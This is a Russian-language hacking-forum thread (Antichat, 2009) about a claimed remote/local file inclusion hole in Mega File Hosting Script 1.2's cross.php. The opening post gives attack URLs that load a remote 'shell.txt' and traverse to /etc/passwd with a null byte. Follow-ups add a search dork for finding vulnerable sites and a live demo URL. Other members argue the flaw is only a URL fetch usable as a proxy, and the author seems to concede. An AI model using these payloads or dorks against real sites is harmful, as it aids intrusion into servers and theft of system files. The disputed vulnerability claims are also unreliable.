HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Веб-уязвимости
Перезагрузить страницу Mega File Hosting [ RFI/ LFI ]
   
Ответ
Страница 1 из 2 1 2 >
 
Опции темы Поиск в этой теме Опции просмотра

Mega File Hosting Script 1.2 (cross.php url) RFI Vulnerability
  #1  
Старый 18.03.2009, 00:32
GarryCka
Новичок
Регистрация: 11.03.2009
Сообщений: 7
С нами: 9035818

Репутация: 2
Smile Mega File Hosting Script 1.2 (cross.php url) RFI Vulnerability
удаленный / локальный файл включения

для 1.2 версий

#############################################
# Mega File Hosting Script 1.2 (cross.php url) RFI Vulnerability #
# Home: #
# Www.hacking.ge #
#############################################

#############################################
Просто помимо этого Exploit и наслаждайтесь #
#############################################


RFI: /cross.php?url=http://site.ru/shell.txt

LFI: /cross.php?url=../../../../../../../../etc/passwd%00


#############################################
#
Author: Garry /// 25/02/2009 #
#
#############################################
𝕏 Twitter Reddit Telegram Копировать ссылку
Последний раз редактировалось GarryCka; 19.03.2009 в 20:56.. Причина: удаленный / локальный файл включения
 
Ответить с цитированием

  #2  
Старый 18.03.2009, 01:10
Tigger
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
С нами: 9846041

Репутация: 1177


По умолчанию
А Дорк?
 
Ответить с цитированием

  #3  
Старый 18.03.2009, 01:15
Велемир
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
С нами: 10470131

Репутация: 142


По умолчанию
Мде...........
 
Ответить с цитированием

  #4  
Старый 18.03.2009, 01:26
PaCo
Постоянный
Регистрация: 06.02.2008
Сообщений: 494
С нами: 9610769

Репутация: 380
По умолчанию
с доркам та все понятно("Powered by: MFH v1"), life example где? скока не гуглил не нащел cross.php?url=, в каком собствено каталоге лежит cross.php? Имхо [:](||||||)[:].
ТС покажи где он тут http://sharemee.co.uk/ например
Последний раз редактировалось PaCo; 18.03.2009 в 01:28..
 
Ответить с цитированием

  #5  
Старый 18.03.2009, 01:27
GarryCka
Новичок
Регистрация: 11.03.2009
Сообщений: 7
С нами: 9035818

Репутация: 2
По умолчанию
Дорк на Mega file hosting сайта:

"Powered by: MFH "
 
Ответить с цитированием

  #6  
Старый 18.03.2009, 01:33
GarryCka
Новичок
Регистрация: 11.03.2009
Сообщений: 7
С нами: 9035818

Репутация: 2
По умолчанию
Demo : http://yabsoft.info/demo/mfhs/cross.php?url=http://forum.antichat.ru/antichat/pic/logo.gif

&

и локальный файл включения в Linux-сервер:

cross.php?url=../../../../../../../../etc/passwd%00
 
Ответить с цитированием

  #7  
Старый 18.03.2009, 01:44
Jokester
Познавший АНТИЧАТ
Регистрация: 18.02.2008
Сообщений: 1,136
С нами: 9593606

Репутация: 4915


По умолчанию
Это код из cross.php

PHP код:
if(function_exists('curl_init'))
{
    $ch curl_init();
    curl_setopt($chCURLOPT_URL$url.'?'.$myquery.'IP_CGI='.$_SERVER['REMOTE_ADDR']);
    curl_setopt($chCURLOPT_HEADER0);
    curl_exec($ch);
    curl_close($ch);
}
elseif(ini_get('allow_url_fopen'))
{
    echo file_get_contents( ($url.'?'.$myquery.'IP_CGI='.$_SERVER['REMOTE_ADDR']) );
}

Последний раз редактировалось jokester; 18.03.2009 в 02:17..
 
Ответить с цитированием

  #8  
Старый 18.03.2009, 01:47
PaCo
Постоянный
Регистрация: 06.02.2008
Сообщений: 494
С нами: 9610769

Репутация: 380
По умолчанию
Цитата:
Сообщение от GarryCka  
Demo : http://yabsoft.info/demo/mfhs/cross.php?url=http://forum.antichat.ru/antichat/pic/logo.gif

&

и локальный файл включения в Linux-сервер:

cross.php?url=../../../../../../../../etc/passwd%00
Че та я сомневаюсь про локальные файлы, да и это не RFI - remote file include - там нету иньекта а просто чтения файла и скорее всего не локального а удаленого, да и зачем %00 ? В http://forum.antichat.ru/antichat/pic/logo.gif судя по этому ничего не добавялеться, короче скорее всего удаленые файлы просто читаються и все.


UPD покамись писал jokester все подтвердил ТС это баян, разве что как прокси использовать, вот так будет не плохая идея насчет прокси халявных
Последний раз редактировалось PaCo; 18.03.2009 в 01:51..
 
Ответить с цитированием

  #9  
Старый 18.03.2009, 01:47
GarryCka
Новичок
Регистрация: 11.03.2009
Сообщений: 7
С нами: 9035818

Репутация: 2
По умолчанию
jokester

Да, это ошибка основана на меня
 
Ответить с цитированием

  #10  
Старый 18.03.2009, 01:49
Jokester
Познавший АНТИЧАТ
Регистрация: 18.02.2008
Сообщений: 1,136
С нами: 9593606

Репутация: 4915


По умолчанию
Цитата:
Сообщение от GarryCka  
jokester

Да, это ошибка основана на меня
Не понял фразы поясни пожалуйста
 
Ответить с цитированием
Ответ
Страница 1 из 2 1 2 >



Предыдущая тема Следующая тема
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Live CD для сисадминов xcedz Для Администратора 21 13.09.2009 22:46
Проблемы с Записью Cd-R Nova "Железо" 17 14.03.2009 17:59
Вопрос по логам An90 Linux, Freebsd, *nix 6 08.02.2009 18:23



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.